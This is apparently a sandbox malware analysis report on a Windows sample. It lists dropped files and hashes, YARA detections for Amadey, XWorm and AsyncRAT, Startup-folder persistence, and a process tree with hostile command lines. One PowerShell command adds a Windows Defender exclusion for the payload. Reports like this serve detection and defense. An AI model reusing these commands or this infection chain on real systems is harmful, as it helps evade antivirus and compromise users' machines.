MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 21:16:10 2024, mtime=Fri Dec 20 21:16:10 2024, atime=Fri Dec 20 21:16:10 2024, length=90112, window=hide
Category:	dropped
Size (bytes):	767
Entropy (8bit):	5.083752205932191
Encrypted:	false
SSDEEP:
MD5:	B8E2713C0D53255E3333DB09F89EAE38
SHA1:	1911639844D0B7D7843C5F40718FB169BADDF116
SHA-256:	77088BED4071000A8B6E4276E1632A286377A30A1E6ABE2FE0E513178D6D67F8
SHA-512:	049B121357277C817BBB56A8530B5C59BA722CAB8EF065BC6A0EF554610AD4591DC57322880484F993957428417B52E52D3FCCE73E50447784826914403D78C9
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ...P.^.,S..P.^.,S..P.^.,S...`......................v.:..DG..Yr?.D..U..k0.&...&.......$..S....206,S...v.,S......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EW<2.Y...../.....................d*6.R.o.a.m.i.n.g.....b.2..`...Y.. .XClient.exe.H......Y...Y.......!.......................X.C.l.i.e.n.t...e.x.e.......\...............-.......[...........v.6......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......980108...........hT..CrF.f4... .........-...-$..hT..CrF.f4... .........-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:
MD5:	CF759E4C5F14FE3EEC41B87ED756CEA8
SHA1:	C27C796BB3C2FAC929359563676F4BA1FFADA1F5
SHA-256:	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
SHA-512:	C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
Malicious:	false
Reputation:	unknown
Preview:	.5.False

C:\Users\user\AppData\Roaming\XClient.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	5.956916783358023
Encrypted:	false
SSDEEP:
MD5:	07E410214A2AEB8F577E407154252F3C
SHA1:	697FAC558B66C0476C3F04D80764FA75EB6DE77D
SHA-256:	12E340E551ABBF8A61A6DD73D45C94E88AA217CEAE070BA0748360D24C706114
SHA-512:	470B208122D6177E4635038418E4966A63725C7F9B21B4D41F3C89B953BAE9A23E141424B358110DE3A8D1624C125224A7471BB44EF7039C313D03E844A20ECC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg.................V..........nt... ........@.. ....................................@..................................t..O.................................................................................... ............... ..H............text...tT... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B................Pt......H.......4t..........&.....................................................(.....r...p. ,-....(.....r!..p. ~.H..s.........s.........s.........s..........r...p. X....r...p. `...r...p. .....r...p. ....r[..p..((....r...p. P4...r@..p. ..e..(,...-.(-...,.+.(....,.+.(+...,.+.(...,..(d..."(....+."(....+.&(F...&+..+5sq... .... .'..or...(,...~....-.(e...(W...~....os...&.-..r...p. r.d..r...p.rH..p. y/...r...p. e....r...p. #,...r...p. &G...rX..p*.

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.4151523299505486
Encrypted:	false
SSDEEP:
MD5:	6EC16A881BD2D15EC78434C67D29E6AF
SHA1:	55527D1D10C7D0EA988CB93CA2CA0558C875A809
SHA-256:	1F6794E127749D48A6E876805202A054B8698278EE366BE8CC13A5FEFD8EC513
SHA-512:	A81B53C46AAFE8255BA462DD6591A9B40215614401FADC97A603A5C65088D90FBCE9693ED67FC928B23652900B6341DAF80C028133DEA783312F18657E8E9D55
Malicious:	false
Reputation:	unknown
Preview:	.....\.Wt.yB..;1pR.aF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469353164566981
Encrypted:	false
SSDEEP:
MD5:	FD9638DEB3AE4AC7F5C687F04580C82B
SHA1:	9F01C5197FBB9FFF505936E85EC13B52E700F0F7
SHA-256:	1B0D8430F544098718E71B1796E98F40ADC5C0BE2B7662D37A239C935F3C3ADF
SHA-512:	7AA1AE7D2A8235DB08AA66A7DB471D182BA9F62C7BFD914A8DEBE3D813D2E29AD250AAC206B185EE1E5D8F987C9C271A0935C3804FB19A85B24A60024F2BF1DF
Malicious:	false
Reputation:	unknown
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.S.\|,S..............................................................................................................................................................................................................................................................................................................................................(j.H........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	5.0682682106683945
Encrypted:	false
SSDEEP:
MD5:	2F644B7E25627553C5731B735473C859
SHA1:	5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
SHA-256:	2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
SHA-512:	E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
Malicious:	false
Reputation:	unknown
Preview:	..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.531591038682421
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'032'576 bytes
MD5:	c9624e4e0c6bbc83b57f844d1dc44102
SHA1:	b0f8c247986305f8f1f83ea55bb04f6c748557ce
SHA256:	a7a661cf43d7129a809901c641998089aff10f97a09bbdf5874ba16c01db5dfb
SHA512:	0417b2186a7f284a79016bd2cc473768293f2c262400439dac659b0a46cff82f72018f6fbbb3ba41b6d76eeff1f96110f8cd5c4739989dafb17942dd0e9a0d23
SSDEEP:	49152:jyKdaGFwF6TL+v1ndNBCT8HlTxD/S8jeHAleOOOOOOOOOOOOOOOOOOOOOOOOOOOU:XdzFwFYLGbNBCT6lV0ll
TLSH:	00E53CB2760572CBD48A277C9427CD8259AD07FA4B2008E79C69B47F7E67CC215B6C2C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x71f000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F08EC8BDFDAh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x5d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31d60c	0x10	hjveylar
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x31d5bc	0x18	hjveylar
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	200bd713021f87aed7d722ee307a8b81	False	0.9977967472752044	data	7.979751074581925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x5d4	0x400	34477384d5c4e9f8bd299d33b1f85f78	False	0.708984375	data	5.793703528132061	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hjveylar	0x6b000	0x2b3000	0x2b2c00	ea6d30d1b66c39a651104fab24bb2b58	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
feaxxngf	0x31e000	0x1000	0x400	9d84b2ef6a8ecb881211d35a3793212b	False	0.80859375	data	6.282338545259295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x31f000	0x3000	0x2200	2ae7f7bef083271ccb40b2042f2a923f	False	0.06192555147058824	DOS executable (COM)	0.7328949075747029	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x31d61c	0x3e4	XML 1.0 document, ASCII text			0.48092369477911645
RT_MANIFEST	0x31da00	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	1
Start time:	17:12:16
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xe70000
File size:	3'032'576 bytes
MD5 hash:	C9624E4E0C6BBC83B57F844D1DC44102
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.2154211467.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:12:19
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x470000
File size:	3'032'576 bytes
MD5 hash:	C9624E4E0C6BBC83B57F844D1DC44102
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2182621065.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:13:00
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x470000
File size:	3'032'576 bytes
MD5 hash:	C9624E4E0C6BBC83B57F844D1DC44102
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.2589474879.0000000005250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	17:13:14
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe"
Imagebase:	0x7ff60a9e0000
File size:	2'338'304 bytes
MD5 hash:	F16E098C7EFAD8AB0B6E62C428E7E649
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:13:21
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe"
Imagebase:	0x7ff702630000
File size:	1'101'736 bytes
MD5 hash:	A732362B415CD62F07D30DB89E742C85
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000B.00000002.4639753741.000001AC373B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	17:13:33
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe"
Imagebase:	0x400000
File size:	4'438'776 bytes
MD5 hash:	3A425626CBD40345F5B8DDDD6B2B9EFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 87%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	17:13:39
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe"
Imagebase:	0xca0000
File size:	90'112 bytes
MD5 hash:	07E410214A2AEB8F577E407154252F3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: 0000000E.00000002.4646618680.0000000001470000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.4661857196.000000000303D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, Author: ditekSHen Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	17:13:42
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Imagebase:	0x7ff605970000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	17:13:42
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	17:13:46
Start date:	20/12/2024
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 65,10
Imagebase:	0x7ff61a570000
File size:	33'280 bytes
MD5 hash:	BEA7464830980BF7C0490307DB4FC875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	17:13:46
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe"
Imagebase:	0x7ff799c70000
File size:	863'093 bytes
MD5 hash:	8EB4F92605E35C57A42B0917C221D65C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 11%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	17:13:48
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	17:13:48
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	17:13:49
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	17:13:49
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	17:13:51
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Imagebase:	0x310000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	17:13:59
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe"
Imagebase:	0xe90000
File size:	4'451'328 bytes
MD5 hash:	0121D24D5F6392439A1D49C2904595E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	17:14:00
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_7.zip -oextracted
Imagebase:	0x310000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	17:14:04
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_6.zip -oextracted
Imagebase:	0x310000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	17:14:06
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_5.zip -oextracted
Imagebase:	0x310000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	17:14:06
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_4.zip -oextracted
Imagebase:	0x310000
File size:	468'992 bytes
